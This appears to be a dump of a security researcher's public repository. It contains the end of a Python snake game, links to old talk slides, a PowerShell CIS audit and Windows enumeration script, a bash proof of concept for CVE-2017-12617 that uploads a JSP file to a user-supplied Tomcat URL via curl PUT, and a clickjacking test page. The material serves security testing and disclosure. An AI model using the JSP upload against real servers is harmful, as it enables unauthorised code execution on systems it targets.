= 2:
21 | if collide(xs[0], xs[i], ys[0], ys[i], 20, 20, 20, 20):die(s, score)
22 | i-= 1
23 | if collide(xs[0], applepos[0], ys[0], applepos[1], 20, 10, 20, 10):score+=1;xs.append(700);ys.append(700);applepos=(random.randint(0,590),random.randint(0,590))
24 | if xs[0] < 0 or xs[0] > 580 or ys[0] < 0 or ys[0] > 580: die(s, score)
25 | i = len(xs)-1
26 | while i >= 1:
27 | xs[i] = xs[i-1];ys[i] = ys[i-1];i -= 1
28 | if dirs==0:ys[0] += 20
29 | elif dirs==1:xs[0] += 20
30 | elif dirs==2:ys[0] -= 20
31 | elif dirs==3:xs[0] -= 20
32 | s.fill((255, 255, 255))
33 | for i in range(0, len(xs)):
34 | s.blit(img, (xs[i], ys[i]))
35 | s.blit(appleimage, applepos);t=f.render(str(score), True, (0, 0, 0));s.blit(t, (10, 10));pygame.display.update()
36 |
37 |
38 |
39 |
40 |
41 |
--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2015/programing arcade games with python.ppt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/Steelcon 2015/programing arcade games with python.ppt
--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2016/Creating Android Apps using App Inventor.pptx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/Steelcon 2016/Creating Android Apps using App Inventor.pptx
--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2016/saved project files/flappybird.aia:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/Steelcon 2016/saved project files/flappybird.aia
--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2016/saved project files/guessthenumber.aia:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/Steelcon 2016/saved project files/guessthenumber.aia
--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2016/saved project files/hello_word.aia:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/Steelcon 2016/saved project files/hello_word.aia
--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2016/saved project files/movingball.aia:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/Steelcon 2016/saved project files/movingball.aia
--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2016/saved project files/paddle.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/Steelcon 2016/saved project files/paddle.png
--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2016/saved project files/pong.aia:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/Steelcon 2016/saved project files/pong.aia
--------------------------------------------------------------------------------
/Old Presentations/Steelcon 2016/saved project files/text_to_speech_copy.aia:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Old Presentations/Steelcon 2016/saved project files/text_to_speech_copy.aia
--------------------------------------------------------------------------------
/Old Presentations/readme.md:
--------------------------------------------------------------------------------
1 |
2 | ### Presentations from 2014 - 2016
--------------------------------------------------------------------------------
/Scripts and pocs/CIS-Checks.ps1:
--------------------------------------------------------------------------------
1 | function enumeration
2 | {
3 | # List OS Version
4 | systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
5 | # Hostname of the System
6 | hostname
7 | # List all services
8 | Get-WmiObject -Class win32_service
9 | # List all users
10 | net users
11 | # Available Network Interfaces and route
12 | ipconfig /all
13 | route print
14 | arp -A
15 | # Active network connections
16 | netstat -ano
17 | netsh firewall show state
18 | netsh firewall show config
19 | # Show all scheduled tasks
20 | schtasks /query /fo LIST /v
21 | # Show services and process IDs
22 | tasklist /SVC
23 | netstart
24 | # Show 3rd Party Drivers
25 | DRIVERQUERY
26 | }
27 |
28 | function patches
29 | {
30 | get-hotfix | select Caption,Description,HotFixID,InstalledOn
31 |
32 | }
33 |
34 | function cis-checks
35 | {
36 |
37 | "----------------------------------------"
38 | "Password Policy checks, "
39 | "----------------------------------------"
40 | "net accounts"
41 | net accounts
42 | "REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Network"
43 | REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Network
44 | "REG QUERY HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters"
45 | REG QUERY HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters
46 | "Passwords Should Be Stored Securely"
47 | "REG QUERY HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel"
48 | REG QUERY HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel
49 | "Checking if Account Lockout Registry is set"
50 | "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess\Parameters\AccountLockout"
51 | REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess\Parameters\AccountLockout
52 |
53 | "----------------------------------------"
54 | "Account auditing"
55 | "----------------------------------------"
56 | "User Logons and Logoffs Audited"
57 | auditpol /get /subcategory:"Logoff"
58 | auditpol /get /subcategory:"Logon"
59 | "Appropiate Events Audited"
60 | auditpol /get /category:*
61 | "Failsafe if Security Events Unable To Be Audited"
62 | reg query HKLM\System\CurrentControlSet\Control\Lsa /v crashonauditfail
63 |
64 |
65 |
66 | "----------------------------------------"
67 | "System Logging"
68 | "----------------------------------------"
69 |
70 | "Checking if EventLog is configured...but check GPO First"
71 | HKLM\Software\Policies\Microsoft\Windows\EventLog\Application\MaxSize
72 | HKLM\Software\Policies\Microsoft\Windows\EventLog\Security\MaxSize
73 | HKLM\Software\Policies\Microsoft\Windows\EventLog\System\MaxSize
74 |
75 |
76 | "Checking if locally configured value is used"
77 | REG QUERY HKLM\SYSTEM\CurrentControlSet\services\eventlog\Application\MaxSize
78 |
79 |
80 | "These policy settings are backed up by the following registry values:"
81 | REG QUERY HKLM\Software\Policies\Microsoft\Windows\EventLog\Application\Retention
82 | REG QUERY HKLM\Software\Policies\Microsoft\Windows\EventLog\Security\Retention
83 | REG QUERY HKLM\Software\Policies\Microsoft\Windows\EventLog\System\Retention
84 |
85 | "If there is no group policy then the following registry values take precedence"
86 | REG QUERY HKLM\SYSTEM\CurrentControlSet\services\eventlog\Security\Retention
87 | REG QUERY HKLM\SYSTEM\CurrentControlSet\services\eventlog\System\Retention
88 | REG QUERY HKLM\SYSTEM\CurrentControlSet\services\eventlog\Application\Retention
89 |
90 |
91 |
92 | "----------------------------------------"
93 | "Firewall State"
94 |
95 | "----------------------------------------"
96 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\DomainProfile /v EnableFirewall
97 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PrivateProfile /v EnableFirewall
98 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PublicProfile /v EnableFirewall
99 | netsh advfirewall show allprofiles
100 |
101 |
102 | "Firewall Notifications: They should all be 0, meaning notifications are enabled."
103 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\DomainProfile /v DisableNotifications
104 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PrivateProfile /v DisableNotifications
105 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PublicProfile /v DisableNotifications
106 |
107 | "Windows Server 2012: These settings control whether local administrators are allowed to create connection security rules that apply together with connection security rules configured by Group Policy."
108 |
109 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PublicProfile /v AllowLocalIPsecPolicyMerge
110 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PrivateProfile /v AllowLocalIPsecPolicyMerge
111 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\DomainProfile /v AllowLocalIPsecPolicyMerge
112 |
113 | "These determine whether locally set firewall rules will be permitted. Otherwise, only those that are set by Group Policy will be permitted."
114 |
115 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PublicProfile /v AllowLocalPolicyMerge
116 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PrivateProfile /v AllowLocalPolicyMerge
117 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\DomainProfile /v AllowLocalPolicyMerge
118 |
119 | "Firewall Rules: review manually"
120 | netsh advfirewall firewall show rule name=all
121 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PublicProfile /v DefaultOutboundAction
122 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PrivateProfile /v DefaultOutboundAction
123 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\DomainProfile /v DefaultOutboundAction
124 |
125 | "Inbound Connections"
126 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PublicProfile /v DefaultInboundAction
127 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\PrivateProfile /v DefaultInboundAction
128 | reg query HKLM\Software\Policies\Microsoft\WindowsFirewall\DomainProfile /v DefaultInboundAction
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 | "----------------------------------------"
139 | "Screensaver Security, Default is not found"
140 |
141 | "----------------------------------------"
142 |
143 |
144 |
145 | "Interactive logon: Machine inactivity limit. Default is disabled"
146 | REG QUERY HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v InactivityTimeoutSecs
147 |
148 |
149 | "Checking screensaver, probs not configued"
150 | REG QUERY HKCU\Software\Policies\Microsoft\Windows\Control Panel\Desktop\ScreenSaveActive
151 |
152 |
153 | "See if screensaver executable is present"
154 | REG QUERY HKCU\Software\Policies\Microsoft\Windows\Control Panel\Desktop\SCRNSAVE.EXE
155 | "Screensaver timeout"
156 | REG QUERY HKCU\Software\Policies\Microsoft\Windows\Control Panel\Desktop\ScreenSaveTimeOut
157 |
158 | "Password protect the screen saver"
159 | REG QUERY HKCU\Software\Policies\Microsoft\Windows\Control Panel\Desktop\ScreenSaverIsSecure
160 |
161 |
162 | "RDP Security"
163 | "Check if password security is disabled"
164 | REG QUERY "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\DisablePasswordSaving"
165 | REG QUERY "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\fPromptForPassword"
166 |
167 |
168 | "----------------------------------------"
169 | "Remote Desktop Encryption"
170 | "----------------------------------------"
171 |
172 | REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel
173 | REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer
174 |
175 | "----------------------------------------"
176 | "UAC"
177 | "----------------------------------------"
178 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken
179 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin
180 |
181 | "----------------------------------------"
182 | "wsus"
183 | "----------------------------------------"
184 | reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\ /v WUServer
185 |
186 |
187 |
188 |
189 | "----------------------------------------"
190 | "Insecure Interactive Logon Settings"
191 |
192 | "----------------------------------------"
193 | reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v crashonauditfail
194 | reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v ForceUnlockLogon
195 | reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v CachedLogonsCount
196 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v LegalNoticeText
197 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v LegalNoticeCaption
198 |
199 |
200 | "----------------------------------------"
201 | "Insecure Network Access Controls And Configuration"
202 | "----------------------------------------"
203 | reg query HKLM\System\CurrentControlSet\Control\Lsa /v RestrictAnonymous
204 | reg query HKLM\System\CurrentControlSet\Control\Lsa /v DisableDomainCreds
205 | reg query HKLM\System\CurrentControlSet\Control\Lsa\MSV1_0 /v NtlmMinClientSec
206 | reg query HKLM\System\CurrentControlSet\Control\Lsa\MSV1_0 /v NtlmMinServerSec
207 |
208 |
209 | "----------------------------------------"
210 | "Insecure Startup Settings, Registry should not be set"
211 | "----------------------------------------"
212 |
213 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisableLocalMachineRun
214 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisableLocalMachineRunOnce
215 |
216 |
217 | "----------------------------------------"
218 | "Insecure SMB Settings"
219 | "----------------------------------------"
220 | reg query HKLM\System\CurrentControlSet\Services\LanmanWorkstation\Parameters /v RequireSecuritySignature
221 | reg query HKLM\System\CurrentControlSet\Services\LanmanServer\Parameters /v EnableSecuritySignature
222 | reg query HKLM\System\CurrentControlSet\Services\LanmanServer\Parameters /v RequireSecuritySignature
223 |
224 |
225 |
226 |
227 |
228 |
229 |
230 |
231 | "----------------------------------------"
232 | "Checking for Null Sessions"
233 | "----------------------------------------"
234 | REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters /v restrictnullsessaccess
235 |
236 |
237 | }
--------------------------------------------------------------------------------
/Scripts and pocs/CVE-2017-12617.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # to use, type sh CVE-2017-12617.sh and give a URL when prompted
3 | # https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
4 |
5 | echo Give the target sites URL
6 | read urlname
7 | echo 'Creating test exploit'
8 | echo ''
9 | echo ''
10 | echo ''
11 | echo "<% out.write(\"[+] JSP file successfully uploaded via curl and JSP out.write executed.
\"); %>" > exploit.jsp
12 | echo trying to upload exploit.jsp to the given URL
13 | request=$(curl -X PUT $urlname/exploit.jsp -d @- < exploit.jsp)
14 | echo 'Printing Response...'
15 | echo ''
16 | echo ''
17 | echo ''
18 | echo $request
19 | echo ''
20 | echo ''
21 | echo ''
22 | echo ''
23 | echo "Check if your file is uploaded by browsing to the target address or: curl http://$urlname/exploit.jsp"
24 |
--------------------------------------------------------------------------------
/Scripts and pocs/Clickjacking poc.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | ClickJacking PoC
5 |
6 | ClickJacking PoC
7 | Your Web Application Can be Mounted within an iFrame which makes it vulnerable to ClickJacking!
8 |
9 |
10 |